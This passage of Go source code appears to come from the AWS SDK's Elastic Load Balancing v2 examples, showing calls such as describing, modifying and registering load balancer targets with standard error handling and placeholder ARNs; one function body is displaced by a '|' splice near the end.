svc := elbv2.New(session.New())
input := &elbv2.DeregisterTargetsInput{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
Targets: []*elbv2.TargetDescription{
{
Id: aws.String("i-0f76fade"),
},
},
}
result, err := svc.DeregisterTargets(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidTargetException:
fmt.Println(elbv2.ErrCodeInvalidTargetException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To describe a listener
//
// This example describes the specified listener.
func ExampleELBV2_DescribeListeners_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DescribeListenersInput{
ListenerArns: []*string{
aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:listener/app/my-load-balancer/50dc6c495c0c9188/f2f7dc8efc522ab2"),
},
}
result, err := svc.DescribeListeners(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeListenerNotFoundException:
fmt.Println(elbv2.ErrCodeListenerNotFoundException, aerr.Error())
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeUnsupportedProtocolException:
fmt.Println(elbv2.ErrCodeUnsupportedProtocolException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To describe load balancer attributes
//
// This example describes the attributes of the specified load balancer.
func ExampleELBV2_DescribeLoadBalancerAttributes_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DescribeLoadBalancerAttributesInput{
LoadBalancerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
}
result, err := svc.DescribeLoadBalancerAttributes(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To describe a load balancer
//
// This example describes the specified load balancer.
func ExampleELBV2_DescribeLoadBalancers_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DescribeLoadBalancersInput{
LoadBalancerArns: []*string{
aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
},
}
result, err := svc.DescribeLoadBalancers(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To describe a rule
//
// This example describes the specified rule.
func ExampleELBV2_DescribeRules_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DescribeRulesInput{
RuleArns: []*string{
aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:listener-rule/app/my-load-balancer/50dc6c495c0c9188/f2f7dc8efc522ab2/9683b2d02a6cabee"),
},
}
result, err := svc.DescribeRules(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeListenerNotFoundException:
fmt.Println(elbv2.ErrCodeListenerNotFoundException, aerr.Error())
case elbv2.ErrCodeRuleNotFoundException:
fmt.Println(elbv2.ErrCodeRuleNotFoundException, aerr.Error())
case elbv2.ErrCodeUnsupportedProtocolException:
fmt.Println(elbv2.ErrCodeUnsupportedProtocolException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To describe a policy used for SSL negotiation
//
// This example describes the specified policy used for SSL negotiation.
func ExampleELBV2_DescribeSSLPolicies_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DescribeSSLPoliciesInput{
Names: []*string{
aws.String("ELBSecurityPolicy-2015-05"),
},
}
result, err := svc.DescribeSSLPolicies(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeSSLPolicyNotFoundException:
fmt.Println(elbv2.ErrCodeSSLPolicyNotFoundException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To describe the tags assigned to a load balancer
//
// This example describes the tags assigned to the specified load balancer.
func ExampleELBV2_DescribeTags_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DescribeTagsInput{
ResourceArns: []*string{
aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
},
}
result, err := svc.DescribeTags(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeListenerNotFoundException:
fmt.Println(elbv2.ErrCodeListenerNotFoundException, aerr.Error())
case elbv2.ErrCodeRuleNotFoundException:
fmt.Println(elbv2.ErrCodeRuleNotFoundException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To describe target group attributes
//
// This example describes the attributes of the specified target group.
func ExampleELBV2_DescribeTargetGroupAttributes_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DescribeTargetGroupAttributesInput{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
}
result, err := svc.DescribeTargetGroupAttributes(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To describe a target group
//
// This example describes the specified target group.
func ExampleELBV2_DescribeTargetGroups_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DescribeTargetGroupsInput{
TargetGroupArns: []*string{
aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
},
}
result, err := svc.DescribeTargetGroups(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To describe the health of the targets for a target group
//
// This example describes the health of the targets for the specified target group.
// One target is healthy but the other is not specified in an action, so it can't receive
// traffic from the load balancer.
func ExampleELBV2_DescribeTargetHealth_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DescribeTargetHealthInput{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
}
result, err := svc.DescribeTargetHealth(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeInvalidTargetException:
fmt.Println(elbv2.ErrCodeInvalidTargetException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeHealthUnavailableException:
fmt.Println(elbv2.ErrCodeHealthUnavailableException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To describe the health of a target
//
// This example describes the health of the specified target. This target is healthy.
func ExampleELBV2_DescribeTargetHealth_shared01() {
svc := elbv2.New(session.New())
input := &elbv2.DescribeTargetHealthInput{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
Targets: []*elbv2.TargetDescription{
{
Id: aws.String("i-0f76fade"),
Port: aws.Int64(80),
},
},
}
result, err := svc.DescribeTargetHealth(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeInvalidTargetException:
fmt.Println(elbv2.ErrCodeInvalidTargetException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeHealthUnavailableException:
fmt.Println(elbv2.ErrCodeHealthUnavailableException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To change the default action for a listener
//
// This example changes the default action for the specified listener.
func ExampleELBV2_ModifyListener_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.ModifyListenerInput{
DefaultActions: []*elbv2.Action{
{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-new-targets/2453ed029918f21f"),
Type: aws.String("forward"),
},
},
ListenerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:listener/app/my-load-balancer/50dc6c495c0c9188/f2f7dc8efc522ab2"),
}
result, err := svc.ModifyListener(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeDuplicateListenerException:
fmt.Println(elbv2.ErrCodeDuplicateListenerException, aerr.Error())
case elbv2.ErrCodeTooManyListenersException:
fmt.Println(elbv2.ErrCodeTooManyListenersException, aerr.Error())
case elbv2.ErrCodeTooManyCertificatesException:
fmt.Println(elbv2.ErrCodeTooManyCertificatesException, aerr.Error())
case elbv2.ErrCodeListenerNotFoundException:
fmt.Println(elbv2.ErrCodeListenerNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupAssociationLimitException:
fmt.Println(elbv2.ErrCodeTargetGroupAssociationLimitException, aerr.Error())
case elbv2.ErrCodeIncompatibleProtocolsException:
fmt.Println(elbv2.ErrCodeIncompatibleProtocolsException, aerr.Error())
case elbv2.ErrCodeSSLPolicyNotFoundException:
fmt.Println(elbv2.ErrCodeSSLPolicyNotFoundException, aerr.Error())
case elbv2.ErrCodeCertificateNotFoundException:
fmt.Println(elbv2.ErrCodeCertificateNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
case elbv2.ErrCodeUnsupportedProtocolException:
fmt.Println(elbv2.ErrCodeUnsupportedProtocolException, aerr.Error())
case elbv2.ErrCodeTooManyRegistrationsForTargetIdException:
fmt.Println(elbv2.ErrCodeTooManyRegistrationsForTargetIdException, aerr.Error())
case elbv2.ErrCodeTooManyTargetsException:
fmt.Println(elbv2.ErrCodeTooManyTargetsException, aerr.Error())
case elbv2.ErrCodeTooManyActionsException:
fmt.Println(elbv2.ErrCodeTooManyActionsException, aerr.Error())
case elbv2.ErrCodeInvalidLoadBalancerActionException:
fmt.Println(elbv2.ErrCodeInvalidLoadBalancerActionException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To change the server certificate
//
// This example changes the server certificate for the specified HTTPS listener.
func ExampleELBV2_ModifyListener_shared01() {
svc := elbv2.New(session.New())
input := &elbv2.ModifyListenerInput{
Certificates: []*elbv2.Certificate{
{
CertificateArn: aws.String("arn:aws:iam::123456789012:server-certificate/my-new-server-cert"),
},
},
ListenerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:listener/app/my-load-balancer/50dc6c495c0c9188/0467ef3c8400ae65"),
}
result, err := svc.ModifyListener(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeDuplicateListenerException:
fmt.Println(elbv2.ErrCodeDuplicateListenerException, aerr.Error())
case elbv2.ErrCodeTooManyListenersException:
fmt.Println(elbv2.ErrCodeTooManyListenersException, aerr.Error())
case elbv2.ErrCodeTooManyCertificatesException:
fmt.Println(elbv2.ErrCodeTooManyCertificatesException, aerr.Error())
case elbv2.ErrCodeListenerNotFoundException:
fmt.Println(elbv2.ErrCodeListenerNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupAssociationLimitException:
fmt.Println(elbv2.ErrCodeTargetGroupAssociationLimitException, aerr.Error())
case elbv2.ErrCodeIncompatibleProtocolsException:
fmt.Println(elbv2.ErrCodeIncompatibleProtocolsException, aerr.Error())
case elbv2.ErrCodeSSLPolicyNotFoundException:
fmt.Println(elbv2.ErrCodeSSLPolicyNotFoundException, aerr.Error())
case elbv2.ErrCodeCertificateNotFoundException:
fmt.Println(elbv2.ErrCodeCertificateNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
case elbv2.ErrCodeUnsupportedProtocolException:
fmt.Println(elbv2.ErrCodeUnsupportedProtocolException, aerr.Error())
case elbv2.ErrCodeTooManyRegistrationsForTargetIdException:
fmt.Println(elbv2.ErrCodeTooManyRegistrationsForTargetIdException, aerr.Error())
case elbv2.ErrCodeTooManyTargetsException:
fmt.Println(elbv2.ErrCodeTooManyTargetsException, aerr.Error())
case elbv2.ErrCodeTooManyActionsException:
fmt.Println(elbv2.ErrCodeTooManyActionsException, aerr.Error())
case elbv2.ErrCodeInvalidLoadBalancerActionException:
fmt.Println(elbv2.ErrCodeInvalidLoadBalancerActionException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To enable deletion protection
//
// This example enables deletion protection for the specified load balancer.
func ExampleELBV2_ModifyLoadBalancerAttributes_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.ModifyLoadBalancerAttributesInput{
Attributes: []*elbv2.LoadBalancerAttribute{
{
Key: aws.String("deletion_protection.enabled"),
Value: aws.String("true"),
},
},
LoadBalancerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
}
result, err := svc.ModifyLoadBalancerAttributes(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To change the idle timeout
//
// This example changes the idle timeout value for the specified load balancer.
func ExampleELBV2_ModifyLoadBalancerAttributes_shared01() {
svc := elbv2.New(session.New())
input := &elbv2.ModifyLoadBalancerAttributesInput{
Attributes: []*elbv2.LoadBalancerAttribute{
{
Key: aws.String("idle_timeout.timeout_seconds"),
Value: aws.String("30"),
},
},
LoadBalancerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
}
result, err := svc.ModifyLoadBalancerAttributes(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To enable access logs
//
// This example enables access logs for the specified load balancer. Note that the S3
// bucket must exist in the same region as the load balancer and must have a policy
// attached that grants access to the Elastic Load Balancing service.
func ExampleELBV2_ModifyLoadBalancerAttributes_shared02() {
svc := elbv2.New(session.New())
input := &elbv2.ModifyLoadBalancerAttributesInput{
Attributes: []*elbv2.LoadBalancerAttribute{
{
Key: aws.String("access_logs.s3.enabled"),
Value: aws.String("true"),
},
{
Key: aws.String("access_logs.s3.bucket"),
Value: aws.String("my-loadbalancer-logs"),
},
{
Key: aws.String("access_logs.s3.prefix"),
Value: aws.String("myapp"),
},
},
LoadBalancerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
}
result, err := svc.ModifyLoadBalancerAttributes(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To modify a rule
//
// This example modifies the condition for the specified rule.
func ExampleELBV2_ModifyRule_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.ModifyRuleInput{
Conditions: []*elbv2.RuleCondition{
{
Field: aws.String("path-pattern"),
Values: []*string{
aws.String("/images/*"),
},
},
},
RuleArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:listener-rule/app/my-load-balancer/50dc6c495c0c9188/f2f7dc8efc522ab2/9683b2d02a6cabee"),
}
result, err := svc.ModifyRule(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeTargetGroupAssociationLimitException:
fmt.Println(elbv2.ErrCodeTargetGroupAssociationLimitException, aerr.Error())
case elbv2.ErrCodeIncompatibleProtocolsException:
fmt.Println(elbv2.ErrCodeIncompatibleProtocolsException, aerr.Error())
case elbv2.ErrCodeRuleNotFoundException:
fmt.Println(elbv2.ErrCodeRuleNotFoundException, aerr.Error())
case elbv2.ErrCodeOperationNotPermittedException:
fmt.Println(elbv2.ErrCodeOperationNotPermittedException, aerr.Error())
case elbv2.ErrCodeTooManyRegistrationsForTargetIdException:
fmt.Println(elbv2.ErrCodeTooManyRegistrationsForTargetIdException, aerr.Error())
case elbv2.ErrCodeTooManyTargetsException:
fmt.Println(elbv2.ErrCodeTooManyTargetsException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeUnsupportedProtocolException:
fmt.Println(elbv2.ErrCodeUnsupportedProtocolException, aerr.Error())
case elbv2.ErrCodeTooManyActionsException:
fmt.Println(elbv2.ErrCodeTooManyActionsException, aerr.Error())
case elbv2.ErrCodeInvalidLoadBalancerActionException:
fmt.Println(elbv2.ErrCodeInvalidLoadBalancerActionException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To modify the health check configuration for a target group
//
// This example changes the configuration of the health checks used to evaluate the
// health of the targets for the specified target group.
func ExampleELBV2_ModifyTargetGroup_shared00() |
// To modify the deregistration delay timeout
//
// This example sets the deregistration delay timeout to the specified value for the
// specified target group.
func ExampleELBV2_ModifyTargetGroupAttributes_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.ModifyTargetGroupAttributesInput{
Attributes: []*elbv2.TargetGroupAttribute{
{
Key: aws.String("deregistration_delay.timeout_seconds"),
Value: aws.String("600"),
},
},
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
}
result, err := svc.ModifyTargetGroupAttributes(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To register targets with a target group
//
// This example registers the specified instances with the specified target group.
func ExampleELBV2_RegisterTargets_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.RegisterTargetsInput{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
Targets: []*elbv2.TargetDescription{
{
Id: aws.String("i-80c8dd94"),
},
{
Id: aws.String("i-ceddcd4d"),
},
},
}
result, err := svc.RegisterTargets(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeTooManyTargetsException:
fmt.Println(elbv2.ErrCodeTooManyTargetsException, aerr.Error())
case elbv2.ErrCodeInvalidTargetException:
fmt.Println(elbv2.ErrCodeInvalidTargetException, aerr.Error())
case elbv2.ErrCodeTooManyRegistrationsForTargetIdException:
fmt.Println(elbv2.ErrCodeTooManyRegistrationsForTargetIdException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To register targets with a target group using port overrides
//
// This example registers the specified instance with the specified target group using
// multiple ports. This enables you to register ECS containers on the same instance
// as targets in the target group.
func ExampleELBV2_RegisterTargets_shared01() {
svc := elbv2.New(session.New())
input := &elbv2.RegisterTargetsInput{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-new-targets/3bb63f11dfb0faf9"),
Targets: []*elbv2.TargetDescription{
{
Id: aws.String("i-80c8dd94"),
Port: aws.Int64(80),
},
{
Id: aws.String("i-80c8dd94"),
Port: aws.Int64(766),
},
},
}
result, err := svc.RegisterTargets(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeTooManyTargetsException:
fmt.Println(elbv2.ErrCodeTooManyTargetsException, aerr.Error())
case elbv2.ErrCodeInvalidTargetException:
fmt.Println(elbv2.ErrCodeInvalidTargetException, aerr.Error())
case elbv2.ErrCodeTooManyRegistrationsForTargetIdException:
fmt.Println(elbv2.ErrCodeTooManyRegistrationsForTargetIdException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To remove tags from a load balancer
//
// This example removes the specified tags from the specified load balancer.
func ExampleELBV2_RemoveTags_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.RemoveTagsInput{
ResourceArns: []*string{
aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
},
TagKeys: []*string{
aws.String("project"),
aws.String("department"),
},
}
result, err := svc.RemoveTags(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeListenerNotFoundException:
fmt.Println(elbv2.ErrCodeListenerNotFoundException, aerr.Error())
case elbv2.ErrCodeRuleNotFoundException:
fmt.Println(elbv2.ErrCodeRuleNotFoundException, aerr.Error())
case elbv2.ErrCodeTooManyTagsException:
fmt.Println(elbv2.ErrCodeTooManyTagsException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To set the rule priority
//
// This example sets the priority of the specified rule.
func ExampleELBV2_SetRulePriorities_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.SetRulePrioritiesInput{
RulePriorities: []*elbv2.RulePriorityPair{
{
Priority: aws.Int64(5),
RuleArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:listener-rule/app/my-load-balancer/50dc6c495c0c9188/f2f7dc8efc522ab2/1291d13826f405c3"),
},
},
}
result, err := svc.SetRulePriorities(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeRuleNotFoundException:
fmt.Println(elbv2.ErrCodeRuleNotFoundException, aerr.Error())
case elbv2.ErrCodePriorityInUseException:
fmt.Println(elbv2.ErrCodePriorityInUseException, aerr.Error())
case elbv2.ErrCodeOperationNotPermittedException:
fmt.Println(elbv2.ErrCodeOperationNotPermittedException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To associate a security group with a load balancer
//
// This example associates the specified security group with the specified load balancer.
func ExampleELBV2_SetSecurityGroups_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.SetSecurityGroupsInput{
LoadBalancerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
SecurityGroups: []*string{
aws.String("sg-5943793c"),
},
}
result, err := svc.SetSecurityGroups(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
case elbv2.ErrCodeInvalidSecurityGroupException:
fmt.Println(elbv2.ErrCodeInvalidSecurityGroupException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To enable Availability Zones for a load balancer
//
// This example enables the Availability Zones for the specified subnets for the specified
// load balancer.
func ExampleELBV2_SetSubnets_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.SetSubnetsInput{
LoadBalancerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
Subnets: []*string{
aws.String("subnet-8360a9e7"),
aws.String("subnet-b7d581c0"),
},
}
result, err := svc.SetSubnets(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
case elbv2.ErrCodeSubnetNotFoundException:
fmt.Println(elbv2.ErrCodeSubnetNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidSubnetException:
fmt.Println(elbv2.ErrCodeInvalidSubnetException, aerr.Error())
case elbv2.ErrCodeAllocationIdNotFoundException:
fmt.Println(elbv2.ErrCodeAllocationIdNotFoundException, aerr.Error())
case elbv2.ErrCodeAvailabilityZoneNotSupportedException:
fmt.Println(elbv2.ErrCodeAvailabilityZoneNotSupportedException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
| {
svc := elbv2.New(session.New())
